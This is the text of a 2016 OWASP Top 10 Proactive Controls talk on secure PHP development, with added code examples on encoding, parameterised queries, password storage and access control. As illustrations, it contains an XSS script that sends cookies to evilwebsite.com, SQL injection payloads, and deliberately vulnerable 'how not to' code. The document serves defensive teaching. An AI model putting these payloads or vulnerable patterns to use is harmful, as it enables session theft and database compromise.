OWASP Top 10 Proactive Controls
Katy Anton @katyanton October 2016
PHPNW16
OWASP Top 10 Risks - 2013
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross Site Scripting ( XSS )
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
Katy Anton
• Software development background
• Certified Secure Software Lifecycle Professional (CSSLP)
• Application Security Consultant @Veracode
• OWASP Bristol Chapter Leader
• Project Co-Leader for OWASP Top 10 Proactive Controls
@katyanton
https://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016
Symfony implementation
Disclosure of information
SQL Injection
New Website
OWASP Application Security Verification Standard (ASVS)
C1. Verify for Security Early and Often
• Choose the level of security for your application
• Security requirements and tests - OWASP ASVS
• Verify for Security Early and Often (OWASP ZAP in continuous integration)
Proactive Control: C1. Verify for Security Early and Often
Risks prevented: All OWASP Top 10 Risks!
SQL injection example
    $email = "'; -- @owasp.org";
    $sql = "UPDATE user SET email='$email' WHERE id='1'";
Becomes
    UPDATE user SET email=''; -- @owasp.org' WHERE id='1'
C2. Parameterize Queries
Parameterized queries prevent untrusted input from being interpreted as part of a SQL command.
C2. Control: Data Access Layer
Example of Query Parametrisation - How not to do it!
PHP:
    <?php
    // Untrusted input is interpolated into the SQL string before prepare() sees it,
    // so the prepared statement gives no protection here.
    $stmt = $dbh->prepare("UPDATE users SET email = {$_GET['email']} WHERE id=$id");
    $stmt->execute();
C2: How NOT to
    $sql = "UPDATE users SET email={$_GET['email']} WHERE id=$id";
This one string combines both the code and the input.
The SQL parser cannot differentiate between code and user input.
C2. Control: Data Access Layer
PHP: Query Parametrization - Correct Usage
    <?php
    // The SQL text contains only placeholders; the values are bound separately.
    $stmt = $dbh->prepare("UPDATE users SET email=:new_email WHERE id=:user_id");
    $stmt->bindParam(':new_email', $email);
    $stmt->bindParam(':user_id', $id);
    $stmt->execute();
Proactive Control: C2. Parameterize Queries
Risks prevented: A1. Injection
XSS example
    <script type="text/javascript">
    var adr = 'http://evilwebsite.com/send.php?cakemonster=' + escape(document.cookie);
    var img = new Image();
    img.src = adr;
    </script>
C3. Encode Your Output
C3: Controls - Contextual Encoding
• Symfony 2+: Twig
• ZF2: Zend\Escaper
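Twig and Zend\Escaper do this for you; the following added example (not from the slides) shows what "contextual" means in plain PHP: the same untrusted value needs a different encoder for the HTML body, a JavaScript string and a URL parameter. The helper names encodeHtml, encodeJs and encodeUrlParam are my own.

```php
<?php
// Added example, not from the slides: contextual output encoding in plain PHP.
// htmlspecialchars() alone is not enough inside a <script> block or a URL.
function encodeHtml(string $v): string
{
    // HTML body and quoted-attribute context: ENT_QUOTES also covers single quotes.
    return htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function encodeJs(string $v): string
{
    // JavaScript string context: json_encode() produces a quoted JS literal, and
    // the HEX flags turn < > & ' " into \uXXXX so "</script>" cannot close the block.
    return json_encode($v, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

function encodeUrlParam(string $v): string
{
    // URL query-parameter context
    return rawurlencode($v);
}

// Constructed untrusted input, modelled on the cookie-stealing script on the XSS slide.
$name = '<script>alert(document.cookie)</script>';

echo '<p>Hello ' . encodeHtml($name) . "</p>\n";
echo '<input value="' . encodeHtml($name) . "\">\n";
echo '<script>var user = ' . encodeJs($name) . ";</script>\n";
echo '<a href="/search?q=' . encodeUrlParam($name) . "\">search</a>\n";
```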
Proactive Control: C3. Encode Output
Risks prevented: A1. Injection, A3. XSS
C4. Validate All Input
C4: Example of Validations
• GET / POST data (including hidden fields)
• File uploads
• HTTP headers
• Cookies
• Database
C4: Controls
PHP filter extension, available as standard since v5.2
Example of both validation and sanitisation:
    <?php
    $sanitised_url = filter_var($url, FILTER_SANITIZE_URL);
    if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) {
        echo "This is a valid URL.";
    }
Input Validation Prevents 2nd Order SQL Injection
Register form (fields: Username, Password)
• Two users: "john" and "john'--"
• Username value "john'--" becomes the SQL injection payload
Change password form (fields: Current Password, New Password, New Password):
Logged in as john'--
2nd Order SQL Injection Example
    UPDATE users SET password='123' WHERE username='john'--' and password='abc'
Becomes
    UPDATE users SET password='123' WHERE username='john'
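The change-password flow from the 2nd-order injection slides, as an added example that is not part of the deck: the concatenated query lets the stored username "john'--" comment out the password check, while the parameterised version (C2) treats it as plain data even though validation (C4) was missed at registration. It runs against an in-memory SQLite database through PDO (assumes the pdo_sqlite extension); the function names are my own, and passwords are stored in clear only to mirror the slide.

```php
<?php
// Added example, not from the slides. Constructed accounts in an in-memory database.
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)");
$ins = $dbh->prepare("INSERT INTO users (username, password) VALUES (:u, :p)");
foreach ([['john', 'abc'], ["john'--", 'xyz']] as [$u, $p]) {
    $ins->execute([':u' => $u, ':p' => $p]);
}

// How NOT to do it: the username read back from the session/database is trusted
// and concatenated, so the "--" stored at registration comments out the check.
function changePasswordVulnerable(PDO $dbh, string $user, string $current, string $new): int
{
    $sql = "UPDATE users SET password='$new' WHERE username='$user' AND password='$current'";
    return $dbh->exec($sql);
}

// Correct usage (C2): every value is bound, so "john'--" is only ever a username string.
function changePasswordSafe(PDO $dbh, string $user, string $current, string $new): int
{
    $stmt = $dbh->prepare(
        "UPDATE users SET password=:new WHERE username=:user AND password=:current"
    );
    $stmt->execute([':new' => $new, ':user' => $user, ':current' => $current]);
    return $stmt->rowCount();
}

// Logged in as "john'--" and supplying a wrong current password.
changePasswordVulnerable($dbh, "john'--", 'wrong', '123');
$johns = $dbh->query("SELECT password FROM users WHERE username='john'")->fetchColumn();
echo "vulnerable: john's password is now '$johns'\n";            // '123'

echo 'safe, wrong current password: rows updated = ',
     changePasswordSafe($dbh, "john'--", 'wrong', '456'), "\n";   // 0
echo 'safe, correct current password: rows updated = ',
     changePasswordSafe($dbh, "john'--", 'xyz', '456'), "\n";     // 1
```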
Proactive Control: C4. Validate All Input
Risks prevented: A1. Injection, A3. XSS, A10. Unvalidated redirects & forwards
New Website
• C1 Verify for Security Early and Often
• C3 Encode Data
• C4 Validate Input
• C2 Parametrize Queries
C5. Implement Identity and Authentication Control
C5: Best practices
• Secure password storage
• Multi-factor authentication
• Secure password recovery mechanism
• Transmit sensitive data only over TLS (v1.2)
• Error messages
• Prevent brute-force attacks
C5. PHP Password storage
• password_hash("my_password", PASSWORD_DEFAULT)
• since PHP v5.5
• compatibility library for versions <5.5
C5. Password storage – How Not To
    $password = bcrypt([salt] + [password], work_factor);
    $loginkey = md5(lc([username]) . "::" . lc([password]));
Be consistent when storing sensitive data!
C5. Forgot Password
Forgot password design:
1) Ask one or more security questions
2) Send the user a randomly generated token
3) Verify the token in the same web session
4) Change password
Resources: https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
C5. Error messages
Error messages must be identical at both the HTTP and the HTML level.
How not to do it!
Error message for valid user
Error message for not-registered user
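An added example, not from the slides, tying the password-storage and error-message points together: password_hash()/password_verify() store and check the credential, and the login path returns one fixed message (and does the same amount of hashing work) whether the username exists or not. The user store is a constructed in-memory array and the function names are my own.

```php
<?php
// Added example, not from the slides: C5 password storage and identical error messages.
const LOGIN_FAILED = 'Invalid username or password.';   // same text for both failure cases

function registerUser(array &$users, string $username, string $password): void
{
    // PASSWORD_DEFAULT is bcrypt today and may change; the hash string records the
    // algorithm, cost and salt, so no separate md5 "loginkey" copy is needed.
    $users[$username] = password_hash($password, PASSWORD_DEFAULT);
}

function login(array &$users, string $username, string $password): array
{
    // Verify against a dummy hash when the user is unknown, so neither the message
    // nor the response time reveals which usernames are registered.
    static $dummy = null;
    $dummy = $dummy ?? password_hash('dummy', PASSWORD_DEFAULT);
    $hash = $users[$username] ?? $dummy;
    $ok = password_verify($password, $hash) && isset($users[$username]);
    if (!$ok) {
        return ['ok' => false, 'error' => LOGIN_FAILED];
    }
    // Transparently upgrade the stored hash when the default cost or algorithm changes.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $users[$username] = password_hash($password, PASSWORD_DEFAULT);
    }
    return ['ok' => true, 'error' => null];
}

$users = [];   // constructed user store
registerUser($users, 'john', 'correct horse battery staple');
var_dump(login($users, 'john', 'correct horse battery staple')['ok']);   // bool(true)
echo login($users, 'john', 'wrong')['error'], "\n";     // Invalid username or password.
echo login($users, 'nobody', 'wrong')['error'], "\n";   // Invalid username or password.
```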
Proactive Control: C5. Establish Identity and Authentication Controls
Risks prevented: A2. Broken Authentication and Session Management
C6. Implement Appropriate Access Controls
C6: Best Practices
• Deny by default
• Least privilege
• Force all requests to go through access control checks
• Check on the server when each function is accessed
C6: Role vs Resource based ACLs
Resource based
    if (user.isPermitted("project:view:123")) {
        // show the project report button
    } else {
        // don't show the button
    }
Role based
    if (user.hasRole("Project Manager")) {
        // show the project report button
    } else {
        // don't show the button
    }
    if (user.hasRole("Project Manager") || user.hasRole("Admin")) {
        // show the project report button
    } else {
        // don't show the button
    }
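A resource-based check in the style of the "project:view:123" string above, as an added example that is not from the slides: permissions are domain:action:instance, "*" is a wildcard, and anything not explicitly granted is denied (C6 "deny by default"). The User class and its permission format are my own construction, not a library API.

```php
<?php
// Added example, not from the slides: resource-based ACL with deny by default.
final class User
{
    private $permissions;

    /** @param string[] $permissions e.g. ['project:view:123', 'project:*:7'] */
    public function __construct(array $permissions)
    {
        $this->permissions = $permissions;
    }

    public function isPermitted(string $required): bool
    {
        $want = explode(':', $required, 3);
        foreach ($this->permissions as $granted) {
            $have = explode(':', $granted, 3);
            if (count($have) !== count($want)) {
                continue;
            }
            $match = true;
            foreach ($want as $i => $part) {
                if ($have[$i] !== '*' && $have[$i] !== $part) {
                    $match = false;
                    break;
                }
            }
            if ($match) {
                return true;   // explicit grant found
            }
        }
        return false;          // deny by default
    }
}

// Constructed users. Run this check on the server for every request that touches
// the resource, not only to decide whether to draw the button.
$pm    = new User(['project:view:123', 'project:edit:123']);
$admin = new User(['project:*:*']);
$guest = new User([]);

var_dump($pm->isPermitted('project:view:123'));     // bool(true)
var_dump($pm->isPermitted('project:view:124'));     // bool(false): another project's id is refused
var_dump($admin->isPermitted('project:delete:9'));  // bool(true)
var_dump($guest->isPermitted('project:view:123'));  // bool(false)
```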
Proactive Control: C6. Implement Appropriate Access Controls
Risks prevented: A4. Insecure Direct Object References, A7. Missing Function Level Access Control
C7. Protect Data
C7 Controls: Data in transit
Data in transit: HTTPS
• Confidentiality: Spy cannot view your data
• Integrity: Spy cannot change your data
• Authenticity: Server you visit is the right one
MITM Protection - HSTS
• HTTPS + Strict-Transport-Security header
C7 Controls: Data at rest
1. Algorithm
• AES (Advanced Encryption Standard)
2. Secure key management
3. Adequate access controls and auditing
Proactive Control: C7. Protect Data
Risks prevented: A6. Sensitive Data Exposure
New Website
• C1 Verify for Security Early and Often
• C3 Encode Data
• C4 Validate Input
• C6 Access Controls
• C5 Authentication
• C7 Protect Data
• C2 Parametrize Queries
C8. Implement Logging and Intrusion Detection
Proactive Control: C8. Logging and Intrusion Detection
Risks prevented: All OWASP Top 10 Risks!
C9. Leverage Security Frameworks and Libraries
C9: Examples
• Framework with CSRF protection
• Framework with XSS protection
• ORM - SQL injection prevention
• Vetted Cryptographic algorithm
C9: Best Practices
Use trusted sources
Low-coupling
(Low-coupling == reduced attack surface)
Update regularly / replace
Proactive Control: C9. Leverage Security Frameworks and Libraries
Risks prevented: All OWASP Top 10 Risks!
C10. Error and Exception Handling
C10: Best Practices
Centralised error handling
Verbose enough to explain the issue
Don’t leak critical information
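The three C10 points in one place, as an added example that is not from the slides: a single exception handler writes the full detail (class, message, file, line, trace) to the server log under a correlation id, and the client receives only that id and a generic message. The handler name and the sample failure are constructed.

```php
<?php
// Added example, not from the slides: centralised error handling for C10.
function handleUncaught(Throwable $e): void
{
    // Correlation id the user can quote in a support request; it links the
    // generic page to the verbose server-side log entry.
    $id = bin2hex(random_bytes(8));
    error_log(sprintf(
        "[%s] %s: %s in %s:%d\n%s",
        $id, get_class($e), $e->getMessage(), $e->getFile(), $e->getLine(),
        $e->getTraceAsString()
    ));
    if (!headers_sent()) {
        http_response_code(500);
    }
    // Nothing about the query, file paths or stack reaches the browser.
    echo "Something went wrong. Reference: $id\n";
}

set_exception_handler('handleUncaught');
ini_set('display_errors', '0');   // never render PHP errors to the client in production

// Constructed failure: a database error whose raw message would leak the query.
throw new RuntimeException("SQLSTATE[42S02]: Base table not found: users (query: SELECT ...)");
```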
Proactive Control: C10. Error and Exception Handling
Risks prevented: All OWASP Top 10 Risks!
New Website
• C1 Verify for Security Early and Often
• C3 Encode Data
• C4 Validate Input
• C6 Access Controls
• C5 Authentication
• C7 Protect Data
• C10 Error Handling
• C8 Logging
• C2 Parametrize Queries
• C9 Leverage Security
It’s a Start
To Secure Software by Default!
Reference
OWASP Proactive Controls Project:
https://www.owasp.org/index.php/OWASP_Proactive_Controls
Thank you